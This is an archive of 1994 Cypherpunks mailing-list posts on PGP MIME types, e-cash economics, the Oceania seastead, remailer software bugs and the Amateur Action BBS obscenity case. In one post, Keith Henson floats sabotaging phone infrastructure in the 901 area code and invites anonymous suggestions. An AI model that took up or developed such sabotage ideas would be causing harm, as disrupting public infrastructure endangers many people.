4P89xac7Weg= =DpF8 - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuNLkCoZzwIn1bdtAQHxOAF8DFx6jqicmEOR4H72Qi8oHbSMwRkyjst5 TFT2J1YyIstTNPCH5Tj2WVwvJHSiSMWr =DnS5 -----END PGP SIGNATURE----- From huntting at glarp.com Mon Dec 5 09:27:39 1994 From: huntting at glarp.com (Brad Huntting) Date: Mon, 5 Dec 94 09:27:39 PST Subject: Well now that we're signing... In-Reply-To: <13848.786598675@cfd20.eng.buffalo.edu> Message-ID: <199412051727.KAA08552@misc.glarp.com> -----BEGIN PGP SIGNED MESSAGE----- For all of you out there who are using MIME headers: There is now an official mime type for PGP (and an RFC to accompany it). Please dont post messages with type "text/x-pgp" or other rot anymore. thanx, brad -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQBVAwUBLuNNUXAfGuY25h+xAQHAQwH+JfzPeEVaUiO/BJdLGlZX9cJAlqIiebie PybwfmbD8JEEf6uQiNXQRn9jD+6h6j/0QPvhD4/PqY7Oxi4kwp814A== =ijlH -----END PGP SIGNATURE----- From rah at shipwright.com Mon Dec 5 09:40:44 1994 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 5 Dec 94 09:40:44 PST Subject: ;-) The definitive argument for e$: tainted cash Message-ID: <199412051740.MAA06424@zork.tiac.net> Fun Facts to Know and Tell About *Your* Legal Tender... > >From the August 1993 American Bar Association Journal >> >> > >> >"The mere presence of trace amounts of cocaine on a common object ... >> > is insufficient to support a felony conviction of cocaine." Lord v. >> > Florida, 91-2147. >> > >> >"[T]he evidence of the narcotic-trained dog's alert to [tainted] currency >> > is of extremely little probative weight. . . . It cannot be doubted >>that >> > contaminated currency is widespread. The presence of trace narcotics on >> > currency does not yield any relevant information whatsoever about the >> > currency's history." US District Court Judge Thomas Wiseman of >>Nashville, >> > Jones v. DEA, No. 3:91-0520 (April 21, 1993). >> > >> >"The probability that every single person in the United States is >> > carrying drug-tainted money is almost certain." -- Dr. James Woodford, >> > forensic chemist in Atlanta. Woodford cites a 1989 experiment by Miami >> > toxicologist Dr. William Hearn, who gathered 135 dollar bills from banks >> > in twelve cities. 131 had traces of cocaine. >> > >> >It also cites a 1985 study by the Miami Herald, which asked eleven >>prominent >> >local citizens to supply a $20 bill for testing, including the Catholic >> >archbishop, George Bush's son Jeb, and Janet Reno. Ten out of the eleven >> >bills had traces of cocaine. >> > >> >Finally, there's a reference to an until-now secret 1987 DEA study >>showing >> >that 1/3 of the money at the Federal Reserve Building in Chicago was >> >tainted with cocaine. It's thought that cocaine is transferred from some >> >bills to agencies' high-speed sorting equipment [...] Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From jamesd at netcom.com Mon Dec 5 09:41:56 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 5 Dec 94 09:41:56 PST Subject: Oceania? In-Reply-To: Message-ID: <199412051741.JAA00580@netcom8.netcom.com> Johnathan Corgan writes > Was this whole project a giant scam? Has this been objectively > demonstrated, or just suspected/believed? Some of the participants were less than truthfull, to me and to others. Was it a scam? In some cases they no doubt believed that it was all for the greater good. In other cases -- if some people made money out of it, then it was a scam. If it was not a scam, then still they pursued their goal by evil means. I doubt that anyone made money out of it. Either way they are untrustworthy people. Myself, I would rather be stabbed in front than behind. The man who loudly says he is your friend, and loudly points to common enemies, is seldom your friend. The Oceania project will not succeed, though I wish it well. There is an alternative project that might succeed, perhaps is already succeeding: Many governments now recognize that they are incapable of governing in a fashion that permits a modern technological society. So they are leasing -- not selling, but long term leases -- regions to be governed by more competent third parties. Singapore is a major beneficiary of this. They find government by Singapore particularly comforting because Singapore has demonstrated expertise in minimizing the dangerous infection of freedom that accompanies capitalism. But I am happy to report the disease seems difficult to contain. Those free trade zones and special economic zones that are most successful, are those that are most thoroughly free. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.comorg From cactus at seabsd.hks.net Mon Dec 5 09:44:37 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Mon, 5 Dec 94 09:44:37 PST Subject: Oceania? Message-ID: <199412051749.MAA04396@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199412050839.AAA11133 at netcom18.netcom.com>, Timothy C. May wrote: >I won't say it's a scam, but a lot of people think it is/was. I >thought it had died some months back, when all posts (of which there >had previously been many) suddnly stopped. They've resumed. The partners had a falling out of some sort, and the "Eric Klein" one has progressed. The Oceania posts for the last n months can be read via NNTP from nntp.hks.net, newsgroup hks.lists.oceania. >The idea of soliciting "contributions" to fund some kind of seagoing >barge, sinkable with a single torpedo (anonymous delivered, easily >enough), is crazy. They're getting more productive than that. The current plan is that they're trying to help launch a business that designs and builds sea structures. They've got some pretty good ideas, and are focusing now more on the idea of producing small tangible results that may one day build to their desired goal. I'm still skeptical as to their chances for success, though, but if enough people with some pragmatic sense get sucked in, there is a chance... - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuNSlSoZzwIn1bdtAQGNYQF5AUBTWMAkeujdopRa2d5tBDUfdzoO/6Cm AE/U82Juo0LdWcs2eadBL5kFQ+DjIHKl =2dCz -----END PGP SIGNATURE----- From peace at BIX.com Mon Dec 5 09:51:22 1994 From: peace at BIX.com (peace at BIX.com) Date: Mon, 5 Dec 94 09:51:22 PST Subject: PGP on a VAX Message-ID: <9412051030.memo.41246@BIX.com> ViaCrypt PGP is now running on a VAX. It will be released after all quality control is complete, in about 2 weeks. From rsalz at osf.org Mon Dec 5 10:38:38 1994 From: rsalz at osf.org (Rich Salz) Date: Mon, 5 Dec 94 10:38:38 PST Subject: Oceania? Message-ID: <9412051833.AA13145@sulphur.osf.org> >They find government by Singapore particularly comforting >because Singapore has demonstrated expertise in minimizing >the dangerous infection of freedom that accompanies >capitalism. Here's something kinda spooky. An OSF staffer doing consulting with the Singapore gov't was asking about how well the DCE security server scales. They're starting a pilot program to make, from birth, every Singaporese an entity known to their server. Based on other questions, I gather the DCE identity card will be used by all gov't services. /r$ From rishab at dxm.ernet.in Mon Dec 5 11:06:08 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Mon, 5 Dec 94 11:06:08 PST Subject: Remailers, RSAREF for PERL Message-ID: Gah! I guess Mike won't send _me_ a copy of his Perl RSA routines... Oh well, I'll wait for some courageous soul to ftp it to garbo. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Mon Dec 5 11:07:22 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Mon, 5 Dec 94 11:07:22 PST Subject: Digicash and currency markets - Economist Message-ID: Alex Strasheim : (?) > Yes, it is granted that Digicash is in beta, and not polished. But > beta testing usually happens after all significant functionality is > present. The Digicash beta isn't moving real money, and that's a > significant functional deficit. So far I haven't seen much discussion on the monetary effect of e-cash. The best (and only) analysis I've seen was in last week's Economist (no, I don't work there, I'm only a fan) of which John Young (jya at pipeline.com) was kind enough to offer e-mail copies. I excerpt: The Economist November 26, 1994, pp. 21-23 [NO INTEREST ON E-CASH:] The more disputed aspects of electronic money's future are those that relate mainly to money's other role, as a store of value. ... If, to command confidence, electronic money had to be convertible into legal tender on demand, then for every unit of electronic money there would have to be a unit of cash reserved in the real economy ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ...which is pretty much how the fledgling CyberCash, for example, plans to operate, requiring banks working with it to hold money converted into e-cash in an escrow account. It follows that, in an efficient system, if each e-cash unit represents an immobilised unit of real cash, then positive balances of e-cash will earn no interest, ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ because the interest they might earn would be offset by the interest foregone on the real cash that is backing them. It also follows that, in such a system, there would be no purely virtual lending: for this would increase the stock of digital money without a corresponding increase in the stock of real money, and so undermine convertibility. The virtual economy in this phase of its development would be free from usury. [BYPASSING REGULATED CURRENCY MARKETS:] If you pay yen for electronic dollars in Tokyo and buy something from a merchant based in Paris who cashes them for francs, a currency conversion has taken place. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ That, however, is an activity towards which most governments feel highly defensive; and if e-cash started to bypass regulated foreign-exchange markets by developing its own grey market for settlement, then governments might be provoked into trying to clamp down on it. Probably, therefore, e-cash will, at least in its early forms, be denominated in single conventional currencies and exchanged at conventional market rates. [Which wouldn't be much fun. For example, in India it's not easy for _me_ to convert rupees into dollars; 75% of dollars I earn must be converted into rupees. Assuming DigiCash takes off; I sell copies of Electric Dreams and become an e-cash millionaire. I can then buy stuff in dollars, which according to regulations I am not supposed to have. Similar problems arise in even less tightly regulated countries. [ON A TOTALLY DIGITAL CURRENCY WITHOUT PAPER BACKING:] It is possible to imagine the development of e-cash reaching this point, and no further. But it is also possible to imagine that the temptation to move away from a fully-backed digital money would prove irresistible. Instinct argues that people will want virtual credit, and that it must therefore find a price. ...there will come a ... stage towards a single overarching monetary system in which convertibility into Legal tender ceases to be a condition for electronic money; and electronic money will thereby become indistinguishable from -- because it will be the same as -- other, more traditional sorts of money. Money will be money whether it is constituted as a string of digits or a piece of paper or an entry in a ledger. Some electronic money might be backed by governments, some by private issuers.... Ideally, the ultimate e-cash will be a currency without a country (or a currency of all countries), infinitely exchangeable without the expense and inconvenience of conversion between local denominations. It may constitute itself as a wholly new currency with its own denomination -- the "cyber-dollar", perhaps..... Either way, it is hard to imagine that the existence of an international, easy-to-use, cheap-to-process, hard-to-tax electronic money will not then force freer convertibility on traditional currencies. "We know everything about you that we need to know" - Coleta Brueck, IRS ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From jya at pipeline.com Mon Dec 5 11:07:43 1994 From: jya at pipeline.com (John Young) Date: Mon, 5 Dec 94 11:07:43 PST Subject: (Fwd) Re: GATT and RSA Message-ID: <199412051911.OAA05274@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- With Rishab's permission today I forward his answer to my query about GATT's effect on copyright of software for those of you who may want to know. Forwarding mail by: rishab at dxm.ernet.in (Rishab Aiyer Ghosh) on Sun, 04 Dec 11:59 PM - ------------------- Rishab writes to another poster: > >So GATT is unlikely to affect RSA. JY asked: > May I assume that your remarks above indicate that you have > details of the GATT agreement that would clarify the following > general summaries in my local rag, The New York Times (I have > not been able to obtain a final copy of the agreement): US software companies benefit because GATT enforces _copyright_ including for software. Not software patents - something totally different, which is what makes PGP 2.3 illegal in the US but not so anywhere else. Rishab - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuNl3ioZzwIn1bdtAQG1eQF9FoWSiCdVoG7zUMnwD8oy1aCrDx+88UZY wtW29fP6+mLWl3pqC0smBebiVLmSRzme =Ph6r -----END PGP SIGNATURE----- From jcorgan at netcom.com Mon Dec 5 11:28:33 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Mon, 5 Dec 94 11:28:33 PST Subject: Dupes? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- This morning I seem to be getting two copies of many of the messages that have come through. Anyone else getting this? ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuNpnE1Diok8GKihAQG/tAP/WVzEfrjUkaNOubRKcBg5E+FISzYCQw7z 8Lf+TB+n+Fhm9pmghYKADIcq1UYH4xhKu71FlRAEbNVqYrgh6Rfa71h+gdWouDIg 6wcm3ZNQmVhE3zbDGFpE/hUgNm6N28/CIWIdmPLeapBjb1JXDOPM5OOQ7XlvFFe1 kvN3vZgcgyw= =osLm -----END PGP SIGNATURE----- From hkhenson at cup.portal.com Mon Dec 5 11:31:23 1994 From: hkhenson at cup.portal.com (hkhenson at cup.portal.com) Date: Mon, 5 Dec 94 11:31:23 PST Subject: AA BBS - Thomases are going to jail... Message-ID: <9412051130.1.17207@cup.portal.com> We have a Problem . . . H. Keith Henson Part of the Federal Government's law enforcement mechanism is under the control of the Religious Right. By reaching out thousands of miles through cyberspace connections, the RR is using Federal power to suppress constitutionally protected activities which they find offensive. I expect the RR people involved feel that what they are doing is fair return for Federal power being used to suppress the school Christmas pageant in a thousand sleepy little towns in middle America--and less dangerous than offing abortion doctors, or killing gays. Most of you reading these groups are familiar with the AA BBS case. In a nutshell, a postal inspector in Memphis called Amateur Action BBS in California, downloaded a dozen files, ordered other stuff, shipped the sysop some unsolicited kiddy porn, then arrested the sysop (Robert Thomas) and his wife (Carleen) for kiddy porn and (by Memphis standards) obscenity. They were tried in Memphis last summer by an obviously biased court. (The judge and prosecutor made no attempt to hide their longstanding mutual admiration.) The Memphis jury found the sysop and his wife guilty of obscenity, but even they couldn't buy the kiddy porn charges, and acquitted on that charge. Friday (Dec. 2, 1994), in the worst perversion of justice I have ever witnessed, the sysop and his wife were sentenced to three years. They were lucky to get that little time. I got a look at the pre-sentencing report. (I may be able to post some of it later.) The recommended sentence included about twice this amount of time based on the kiddy porn charge they were *acquitted* of. Those reports are simply *amazing*. They cover family members and history out a generation or so in all directions, not to mention school, medical records, tax filings, and any police record--even if you were found innocent! It seems to be the function of these things to put your entire life in the worst possible light. Someone should take the form and do one for Christ just prior to the Crucifixion. It would run something like: ". . . questionable father, . . low class occupation (carpenter), . . . accused of impersonating a doctor by healing sick, . . . known to associate with low class persons, . . . travels about (vagabond), . . ." Back to the problem. I find the situation intolerable--without having a clear idea of how to deal with it. With little more effort (though a lot more skill than the postal inspector demonstrated) the RR-controlled Feds can create crime and venue problems for just about anyone running a BBS or net node. Certainly *any* system which carries alt.sex.* is subject to the same treatment by the Religious Right (in the guise of the Memphis Feds) as AA BBS. In fact, the very .gifs that were found obscene in Memphis were made "freely distribute," by Robert and have been posted *many* times to the net. Could we use economic retaliation? I won't use Federal Express any more because it and Graceland (and the cat houses near Graceland) seem to be the economic mainstays of Memphis. Unfortunately, even a very effective economic boycott is not going to have an effect on the zealots, and depressing that area further might make it an even *more* repressive backwater because the last of the intelligent/tolerant people would move out. On the other hand, economic pressures might induce the more sensible part of the community to pressure the zealots into being more tolerant (at least of people 3 time zones away!). In recent years economic pressure has induced two states to change laws. A positive sign that economic pressure might be effective is that the local newspaper did *not* support the prosecution. Research question: Why did the Memphis Feds back off after the Deep Throat trials? Is the law any help? After nearly a year of watching the process, I am *quite* pessimistic. In its own way, the court system is deeply corrupt. I think even the RR folks know this is a political case and not a criminal one. In political cases, leaving a person out on bail during appeal is normal, but in this case, it is very much in the government's interest to have Robert out of circulation so he cannot pursue the Electronic Communication Privacy Act suit and other causes of action against them in civil court. Robert's motion for bail during appeal was denied. Are there political routes? Yes, but chancy. It is possible that a political fight with the RR might backfire and result in heavy restrictions on the nets. Coming down hard on the nets would be very popular with the Administration forces after the Clipper debacle. The power of the net to organize political force must be quite worrying to those in power. (It is clear to me that modern day revolutions, anywhere in the world, and peaceful or not, would be organized through the net. In some places this has already happened.) It may be that a general cutting down on the powers of the Federal Government is in order. This has pros and cons, and support (in some areas) even from the RR. How *does* one shrink the unshrinkable? Tax revolts (in the form of massive political pressure) seem to come about when the tax rates get as high as they are now. Another possibility is that the formation of private money may greatly shrink the ability of governments everywhere to collect taxes. Should people start thinking about direct action? I hope we don't come to this! There is nothing I can think of worse than arousing the technically knowledgeable to take the infrastructure apart. Problem is that pinpoint damage (like taking the 901 area code down for a few days or weeks) is somewhere between impossible and probably impossible. (Though ATT managed to take down their entire phone network for a day with a missing "case" statement.) Your thoughts and suggestions would be appreciated. Please post encrypted through a remailer chain if you absolutely *must* post ideas about the last paragraph! S ,. From talon57 at well.sf.ca.us Mon Dec 5 11:52:07 1994 From: talon57 at well.sf.ca.us (Brian D Williams) Date: Mon, 5 Dec 94 11:52:07 PST Subject: better than Oceania Message-ID: <199412051951.LAA02901@well.sf.ca.us> 'punksters, Far more interesting than Oceania is the Millennial Project. It is not only in it's second revised edition, but has a very active BBS and hopes to be a list on the net soon (there looking for an assist with this so anyone who can help them out, would be appreciated) They have also had two national gatherings, and the group has numerous engineers running various planning committees, and they have downloadable spreadsheets on various aspects. It is a definate breath of fresh air from all the doomsayers out there. They also have a healthy respect for privacy and encryption. The book is available at any good bookstore. "The Millennial Project" seven easy steps to colonizing the Galaxy by Marshall Savage. Brian Williams Extropian Cypherpatriot "Cryptocosmology: Sufficently advanced communication is indistinguishable from noise." --Steve Witham "Have you ever had your phones tapped by the government? YOU WILL and the company that'll bring it to you.... AT&T" --James Speth From raph at netcom.com Mon Dec 5 11:53:48 1994 From: raph at netcom.com (Raph Levien) Date: Mon, 5 Dec 94 11:53:48 PST Subject: PGP MIME type (was Well now that we're signing...) In-Reply-To: <199412051727.KAA08552@misc.glarp.com> Message-ID: <199412051953.LAA03423@netcom11.netcom.com> Brad Huntting writes: > For all of you out there who are using MIME headers: There is now > an official mime type for PGP (and an RFC to accompany it). Please > dont post messages with type "text/x-pgp" or other rot anymore. Where? Which RFC? I just checked the IANA media-types directory (at ftp://ftp.isi.edu/in-notes/iana/assignments/media-types), and there was no PGP type listed. I also searched through recent RFC titles, and found nothing appropriate. There is of course a draft by Nat Borenstein et al, but it is not an official RFC yet. Therefore, it is not valid MIME. Last I heard, it was taking a fairly low priority. The draft doesn't address the fact that a clearsigned message is readable text, and therefore should be text/pgp rather than application/pgp. He is planning to fix this. My premail software generates the application/x-pgp type, which _is_ valid MIME. So is text/x-pgp, which I don't support yet because premail 0.30 doesn't do clearsigning (hopefully, the next release will). I am eager to switch to the official MIME type as soon as it is out. If anyone knows better, please let me know. Raph From merriman at metronet.com Mon Dec 5 12:40:11 1994 From: merriman at metronet.com (David K. Merriman) Date: Mon, 5 Dec 94 12:40:11 PST Subject: ;-) The definitive argument for e$: tainted cash Message-ID: <199412052040.AA18252@metronet.com> -----BEGIN PGP SIGNED MESSAGE----- FWIW: A similar experiment done here in the DFW area a few weeks ago. 4 of 11 bills tested "positive" by DEA coke-sniffing machinery. Dave Merriman -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLuN4mcVrTvyYOzAZAQHtZAQAm8b86IuL02BdGihyyuhLExkcntHZozM0 S2iYFik2c9Wl0r5O7qV5XJBRRHcUSmLNTzk6AaaNIj8C0tOKAWqj3/GzqKsC03mU exxtxt7uAr59TL4iL88mL/C4Ne89H3zqIYnTOD8r6p0oIHpOWE5XfGBON5LpTIvw UWuhsvO0VV0= =STRk -----END PGP SIGNATURE----- - - - - - - - - - - - - - - - - - - - - - - - - - - Finger merriman at feenix.metronet.com for PGP public key and fingerprint. PGP encrypted Email welcome, encouraged, and preferred. "Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From pcw at access.digex.net Mon Dec 5 12:42:07 1994 From: pcw at access.digex.net (Peter Wayner) Date: Mon, 5 Dec 94 12:42:07 PST Subject: (Fwd) Re: GATT and RSA Message-ID: <199412052041.AA00620@access3.digex.net> I want to know whether GATT will affect the export of encryption software. It seems to frown upon any barrier to trade and I think I could argue, perhaps not correctly, that if ACME in Taiwan can't buy the necessary encryption software to do business with CENTRAL in Kansas, then ACME is prevented from competing in America. BONEHEAD Inc, from North Dakota won't have to worry about foreign competition. This means that either there can be no secure international EDI standard that anyone can use to do business or there will be trade barriers to foreigners interacting with American firms. Of course, this is just a random conjecture based upon a conversation I had with Dave Banisar. Is it silly? Or sensible? I'm sure there are exemptions for military hardware, but heck, when it comes down to it food is the ultimate strategic resource. Where does crypto lie in this spectrum? Everyone knows where it lies in the eyes of the NSA. Where does it lie in other people's reality? -Peter From lcottrell at popmail.ucsd.edu Mon Dec 5 13:11:05 1994 From: lcottrell at popmail.ucsd.edu (Lance Cottrell) Date: Mon, 5 Dec 94 13:11:05 PST Subject: PGP Tools under Linux (Pr0duct Cypher) Message-ID: <199412052110.NAA24226@ucsd.edu> -----BEGIN PGP SIGNED MESSAGE----- To: Pr0duct Cypher Pr0duct Cypher writes: >I wrote: >>I am using PGPTools to handle all the crypto functions in the second >>generation remailer that I have written. All the copies of PGPTools that I >>have found seem to be set up to compile on SUN workstations only. > >That's interesting, because I developed it under Linux and MS/DOS, and there >was a lot of trouble at the beginning with it not running on big-endian >machines. It sounds like whoever "fixed" it for sparcs broke it for >little-endian machines. The original should still be on ftp.csn.net; get it >there and it should work. > >>Mixmaster is both a remailer and a front end, and therefor must run on many >>different platforms. I have been able to compile PGPTools on Linux and >>FreeBSD, but PGPTools produces invalid RSA blocks. If you (or anyone else >>reading this) have ported PGPTools to other platforms could you send me the >>source and makefile, or point me to them. If not, could you help me do it, >>the source code is a tangle, and it will take me a long time to do on my own >>(I am a brute force programer, not a C wizard). > >Get the original, test it, and post the results. > > - Pr0duct Cypher Ok, I grabbed second oldest version (this included a bugfix). I compiles and seems to work fine when I use it with PTD. It fails when run under Mixmaster. The failure is deep inside pgptools. When I call pgpk_findkey to get a key from a public key ring (by name not number), it chugs along checking each key id in the ring. Each time it checks a key, it uses a pair of fifo's which it then destroys. After checking the second id, when it is destroying kc (k is destroyed without problems both times), I get a segmentation violation in the line nfb=fb->next; Since kc was simply a copy of k kc=fifo_copy(k); I suspect the problem lies in fifo_copy. These are all mem fifo's. If you want to look at the source code I am playing with (with tons of debugging printfs in it) let me know and I will stick it on my ftp. -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLuOBVFVkk3dax7hlAQGYNAP9GvDMvdSKA1vUsmJB/xitPVsiazNeZjXJ NrjwouMg85VR1ri1rm1y2NuKbHEljGfwNB7z8euy7e1clptRsN4WWrP+ASSfrire 9Clan80Ep4lEA+83caArQv3Hcdb8+8FnLpXd/zrPI2V/3TVM2OrfU7/RtUo+3Pr3 JE2d0s6Jn+E= =jlbs -----END PGP SIGNATURE----- -- Lance Cottrell http://nately.ucsd.edu/~loki/ Home of the remailer chaining script "chain". PGP 2.6 key available by finger or server. "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche From jrochkin at cs.oberlin.edu Mon Dec 5 13:26:02 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Mon, 5 Dec 94 13:26:02 PST Subject: Remailers and "##" Message-ID: <199412052125.QAA08290@cs.oberlin.edu> I know there's some kind of a syntax you can use involving "##", with some of the remailers, and the remailer will insert a header line into the message. But I'm having trouble figuring out what syntax this is. Can anyone help me out? From frissell at panix.com Mon Dec 5 13:26:30 1994 From: frissell at panix.com (Duncan Frissell) Date: Mon, 5 Dec 94 13:26:30 PST Subject: AA BBS - Thomases are going to jail... Message-ID: <199412052124.AA14970@panix.com> At 11:30 AM 12/5/94 PST, hkhenson at cup.portal.com wrote: >Part of the Federal Government's law enforcement mechanism is under >the control of the Religious Right. Stuff about the AA BBS bust elided. One should note that this prosecution is similar to others carried out against the sellers of physical visual pornography for years. The stings have been carried out by both Republican and Democratic federal prosecutors usually in border states. They started before there was an official Religious Right. The US Attorney in this case may have been a Democrat since most Republicans were replaced by Clinton. He, she, or it is probably not a member of the RR. >I find the situation intolerable--without having a clear idea of how >to deal with it. There will be an appeal. >Certainly *any* system which carries alt.sex.* is subject to the same >treatment by the Religious Right (in the guise of the Memphis Feds) as >AA BBS. In fact, the very .gifs that were found obscene in Memphis >were made "freely distribute," by Robert and have been posted *many* >times to the net. That will be an interesting case. DCF ************************************************************************* ATMs, Contracting Out, Digital Switching, Downsizing, EDI, Fax, Fedex, Home Workers, Internet, Just In Time, Leasing, Mail Receiving, Phone Cards, Quants, Securitization, Temping, Voice Mail. From cactus at hks.net Mon Dec 5 13:58:03 1994 From: cactus at hks.net (L. Todd Masco) Date: Mon, 5 Dec 94 13:58:03 PST Subject: Privacy seminar Message-ID: <199412052202.RAA00842@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Has the privacy seminar been dropped? Last message I've seen from it was November 5. Thanks, -- Todd - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuONtioZzwIn1bdtAQHK1wGAlR4l8iUNvGZ401ub4P6TMibXlW5vYAoP ZrSJysUUsdFIuPHUkauWYKwiiRtVRqga =Y5Vd -----END PGP SIGNATURE----- From wcs at anchor.ho.att.com Mon Dec 5 15:04:53 1994 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Mon, 5 Dec 94 15:04:53 PST Subject: Oceania? Message-ID: <9412052037.AA07049@anchor.ho.att.com> The Oceania folks may or may not have been serious; I don't know them well enough to judge. If they were serious, they weren't competent - nowhere in their literature did I see anything that implied that the question "Can I look at your financial plans?" would get a useful answer. The primary gamble for Oceania is that you could set up a country without having a piece of dirt to anchor it to and get other governments to treat it as a government, rather than getting the US government to treat it as a drug-running boat on the high seas (i.e. target for Coast Guard piracy), or getting some other government or free-market pirates interested. (Secondary gambles are things like financial stability, hurricanes, etc.) One of their magazines had an article on a floating hotel built by Sven somebody that's recently been anchored off Vietnam. Rather than trying to raise $1B or so to build The Raft and gamble on not losing it all to governments or other pirates, you could make the same gamble by buying the floating hotel for $25-50M, which you might even be able to talk some rich investor into coughing up in return for a slice of the pie. That'd be enough to knwo if it works, get your satellite dish up, and see if you can convince a hundred or so enthusiasts to move there, run a gambling casino, and make back some bucks to pay some dividends for your investors and hire a few mercenaries to protect the place. However, they made some nice T-shirts :-) A more serious effort was done in the early 70s by the Minerva folks, who built up an island out of coral reefs in the South Pacific (the UN tends to require 1 foot above mean high tide to count as enough dirt to be a country.) About six months later the Kingdom of Tonga invaded and stole the place. Bill From mccoy at io.com Mon Dec 5 15:22:51 1994 From: mccoy at io.com (Jim McCoy) Date: Mon, 5 Dec 94 15:22:51 PST Subject: AA BBS - Thomases are going to jail... In-Reply-To: <9412051130.1.17207@cup.portal.com> Message-ID: <199412052321.RAA04665@pentagon.io.com> > From: hkhenson at cup.portal.com [...] > By reaching out thousands of miles through cyberspace connections, the > RR is using Federal power to suppress constitutionally protected > activities which they find offensive. [...] After having spent most of Saturday at an EFF-sponsored workshop on sysop liability and the law I will throw in a few bits of information passed on at this event from real lawyers (Mike Godwin gave the "porno on the net" talk and the AA case was highlighted in it, but all of the lawyers there had interesting things to say about this situation.) First of all, "obscenity" is _not_ constitutionally protected. "Pornography" is protected if it meets several standards established in various decisions of the Supreme Court, obscenity is that which does not pass these standards. There are a lot of ways to get around the community standards part of the test if the questionable bits have any artistic merit, instructional or informational use, or do not simply appeal to prurient interest. The "community standards" bit is the last line of defense and the only one of much interest here. > Most of you reading these groups are familiar with the AA BBS case. > > In a nutshell, a postal inspector in Memphis called Amateur Action BBS > in California, downloaded a dozen files, ordered other stuff, shipped > the sysop some unsolicited kiddy porn, then arrested the sysop (Robert > Thomas) and his wife (Carleen) for kiddy porn and (by Memphis standards) > obscenity. This case is yet another example of bad fact leading to bad law. The big problem here is that the sysops of this BBS were mailing out video tapes to customers; while it may not be popular to criticize the current net.martyrs of the month, the biggest reason they got busted is because they were stupid. The fact that they shipped the video tapes made it much easier for the Memphis prosecutors to claim that they were involved in transportation of obscene material to Tennessee. It also blew apart any claim they could have made regarding the fact that the postal inspector connected to the BBS and "pulled" the bits rather than having them "pushed" (e.g. he initiated the transfer and the sysops were unaware of the transportation...obscenity stuff does have some reliance upon knowledge of the contents and upon the alledged perpetrator knowing that the shipment was taking place) because they then went and shipped this video tape, an action which could not have been done without thier knowledge and in which the transportation was caused by the sysop's action. It also meant they they could not claim that they were unaware of the final destination of the bits. Morons. On the upside of things relating to this case, it seems that thier counsel was rather inept, in fact the judge in this case "spoke from the bench" and lambasted the AA couple's lawyer and being incompetent and completely unable to handle the case. This will make it much easier for the couple to appeal thier conviction, as the judge's opinion of thier counsel's competency is now a matter of record. > The Memphis jury found the sysop > and his wife guilty of obscenity, but even they couldn't buy the kiddy > porn charges, and acquitted on that charge. The reason they were acquitted on the kiddie porn charge is that the law enforcement officials acted too quickly. The envelope containing the offending video tape of kiddie porn had been delivered the day of the arrest and had not even been opened. [...] > Certainly *any* system which carries alt.sex.* is subject to the same > treatment by the Religious Right (in the guise of the Memphis Feds) as > AA BBS. In fact, the very .gifs that were found obscene in Memphis > were made "freely distribute," by Robert and have been posted *many* > times to the net. Sorry, but "*any* system which carries alt.sex.*" is probably not providing access to people from Tennessee, and even then the admins of such a site can probably work thier case to be closer to the bookseller situation of not knowing the specific contents of the aforementioned groups (the 